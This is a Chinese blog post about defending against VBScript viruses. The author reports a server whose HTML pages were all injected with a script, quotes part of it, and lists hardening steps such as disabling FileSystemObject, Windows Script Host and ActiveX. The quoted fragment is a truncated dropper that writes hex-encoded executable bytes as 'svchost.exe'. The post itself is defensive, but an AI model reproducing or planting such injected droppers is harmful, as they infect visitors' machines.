怎樣防範vbs指令碼病毒
https://blog.csdn.net/persistencegoing/article/details/84376427
大早上,發現伺服器被人攻擊了,所有的 html 都被植入了一段 vbscript
<!DOCTYPE html>
<
html
>
<
head
>
<
meta
http-equiv
=
"content-type"
content
=
"text/html;charset=utf-8"
/>
<
title
>這是網頁標題</
title
>
</
head
>
<
body
></
body
>
</
html
><
SCRIPT
Language
=
VBScript
>
<!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004C010300BC7CB1470000000000000000E0000F010B01070400E000000010000000E0010030C0020000F0010000D002000000400000100000000200000A00000008000100040000000000000000E002000010000000000000020000000000100000100000000010000010000000000000100000000000000000000000E8D402001001000000D00200E80400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000E00100001000000000000000040000000000000000000000000000800000E0555058310000000000E0000000F0010
這是部分程式碼
vbs病毒是使用VBScript編寫的,因為編寫簡單,經常被用到。那麼,怎樣防範vbs指令碼病毒呢?一起了解下吧。
1)禁用檔案系統物件FileSystemObject
方法:用regsvr32scrrun.dll/u這條命令就可以禁止檔案系統物件。其中regsvr32是Windows\System下的可執行檔案。或者直接查詢scrrun.dll檔案刪除或者改名。
還有一種方法就是在登錄檔中HKEY_CLASSES_ROOT\CLSID\下找到一個主鍵{0D43FE01-F093-11CF-8940-00A0C9054228}的項,咔嚓即可。
2)解除安裝WindowsScriptingHost
在Windows98中(NT4.0以上同理),開啟[控制面板]→[新增/刪除程式]→[Windows安裝程式]→[附件],取消“WindowsScriptingHost”一項。
和上面的方法一樣,在登錄檔中HKEY_CLASSES_ROOT\CLSID\下找到一個主鍵{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}的項,咔嚓。
3)刪除VBS、VBE、JS、JSE檔案字尾名與應用程式的對映
點選[我的電腦]→[檢視]→[資料夾選項]→[檔案型別],然後刪除VBS、VBE、JS、JSE檔案字尾名與應用程式的對映。
4)在Windows目錄中,找到WScript.exe,更改名稱或者刪除
如果你覺得以後有機會用到的話,最好更改名稱好了,當然以後也可以重新裝上。
5)要徹底防治VBS網路蠕蟲病毒,還需設定一下你的瀏覽器
我們首先開啟瀏覽器,單擊選單欄裡“Internet選項”安全選項卡里的[自定義級別]按鈕。把“ActiveX控制元件及外掛”的一切設為禁用,這樣就不怕了。呵呵,譬如新歡樂時光的那個ActiveX元件如果不能執行,網路傳播這項功能就玩完了。
6)禁止OE的自動收發郵件功能
7)由於蠕蟲病毒大多利用副檔名作文章,所以要防範它就不要隱藏系統中已知檔案型別的副檔名
Windows預設的是“隱藏已知檔案型別的副檔名稱”,將其修改為顯示所有檔案型別的副檔名稱。
8)將系統的網路連線的安全級別設定至少為“中等”
它可以在一定程度上預防某些有害的Java程式或者某些ActiveX元件對計算機的侵害。
最後友情提醒,預防vbs指令碼病毒,防毒軟體確實很必要,儘管有些防毒軟體挺讓廣大使用者失望,不過,選擇是雙方的哦。在這個病毒橫飛的網路,如果您的機器沒有裝上防毒軟體我覺得確實挺不可思議的。
希望大家關注我一波,防止以後迷路,有需要的可以加群討論互相學習java ,學習路線探討,經驗分享與java求職 群號:721515304